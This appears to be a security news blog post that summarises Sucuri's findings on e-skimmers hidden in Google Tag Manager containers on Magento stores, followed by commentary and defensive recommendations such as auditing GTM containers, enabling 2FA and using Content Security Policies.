Listen to this Post
2025-02-16
Cybercriminals Use Google’s Own Tools to Steal Credit Card Data
Researchers at Sucuri have uncovered a new cyber threat where hackers are leveraging Google Tag Manager (GTM) to deploy e-skimmer malware on Magento-based eCommerce sites. This technique allows attackers to steal credit card data directly from checkout pages by embedding malicious scripts into GTM containers.
GTM is a legitimate Google service that helps website owners manage marketing tags without modifying their site’s core code. However, cybercriminals have found a way to abuse this tool, embedding malicious JavaScript into GTM containers to evade detection.
Sucuri’s investigation revealed that hackers injected malicious code into a website’s database, disguising it as a Google Analytics or GTM script. This method makes detection difficult because security systems typically trust Google’s scripts. The research also shows that this technique is not new—back in 2024, experts documented how Magecart hacker ATMZOW used GTM to spread e-skimmers.
Initially, Sucuri identified six infected eCommerce websites using a malicious GTM identifier (GTM-MLHK2N68). However, by the time of their latest report, the number of compromised sites had dropped to three.
How the Attack Works:
- Hackers inject an obfuscated JavaScript payload inside a GTM container.
- The script steals credit card details from checkout pages.
- The stolen data is transmitted to an external server controlled by the attackers.
- The malware uses Base64 encoding and mathematical obfuscation techniques to remain hidden.
- Attackers modify Google Analytics scripts to execute the skimmer unnoticed.
This GTM-based attack highlights the growing sophistication of modern cyber threats, where hackers exploit trusted platforms to distribute malware. Sucuri warns that detecting such threats requires deep forensic analysis to uncover hidden scripts and malicious payloads.
What Undercode Says:
The use of Google Tag Manager (GTM) as a malware delivery system is an alarming trend that underscores the evolving tactics of cybercriminals. Here’s why this attack is particularly dangerous and what it means for the future of cybersecurity.
1. Legitimate Tools Are Becoming Cyber Weapons
Google Tag Manager was built to help businesses streamline analytics and marketing. However, attackers abuse the trust associated with Google’s services, making it difficult for security solutions to detect threats. Security teams must rethink traditional “trusted” platforms and introduce stricter validation processes.
2. E-Skimmers Are a Growing Threat to E-Commerce
The Magecart group has been pioneering e-skimming attacks for years, and this GTM exploit proves that these threats are not slowing down. Any online store that processes payments is a target. Businesses must take proactive measures to protect their checkout pages.
3. Obfuscation and Encoding Make Detection Harder
The attackers used Base64 encoding, function obfuscation (_0x5cdc), and modified Google Analytics scripts to hide their malware. This level of sophistication means traditional security scans may not catch the threat. Security analysts need advanced threat detection tools capable of identifying obfuscated scripts.
4. A Shift in Cybersecurity Strategy Is Needed
Relying solely on firewalls and signature-based detection is no longer enough. Companies should implement:
– Behavioral analysis to detect anomalies in website scripts.
– Regular integrity checks on GTM containers and external scripts.
– Content Security Policies (CSPs) to restrict unauthorized script execution.
5. Google Needs to Strengthen GTM Security
While Google Tag Manager is not inherently at fault, the company must introduce stronger security controls to prevent abuse. Some suggestions include:
– Requiring stricter authentication for GTM changes.
– Enhanced monitoring for suspicious scripts.
- Automatic alerts when a GTM container loads an unknown third-party script.
6. Website Owners Must Stay Vigilant
Magento store owners and anyone using GTM should immediately:
✅ Audit all GTM containers for unauthorized scripts.
✅ Enable two-factor authentication (2FA) for GTM accounts.
✅ Monitor checkout pages for unusual script activity.
✅ Keep all eCommerce platform updates and security patches up to date.
- The Future of Cyber Attacks Will Be Even More Subtle
This attack demonstrates how cybercriminals are shifting towards stealthier techniques by leveraging trusted third-party services. In the future, we can expect:
– More attacks using cloud-based marketing tools (e.g., Google Analytics, Facebook Pixel).
– Automated attacks that adapt to security updates in real-time.
– Deepfake and AI-generated obfuscation techniques to make malware even harder to detect.
Final Thoughts
The exploitation of Google Tag Manager is a wake-up call for businesses and security professionals. If a tool is widely trusted, hackers will find a way to exploit it. E-commerce sites must increase monitoring of third-party scripts and adopt advanced security measures to stay ahead of evolving cyber threats.
References:
Reported By: https://securityaffairs.com/174085/cyber-crime/google-tag-manager-gtm-e-skimmer-software-in-magento.html
https://www.instagram.com
Wikipedia: https://www.wikipedia.org
Undercode AI: https://ai.undercodetesting.com
Image Source:
OpenAI: https://craiyon.com
Undercode AI DI v2: https://ai.undercode.help
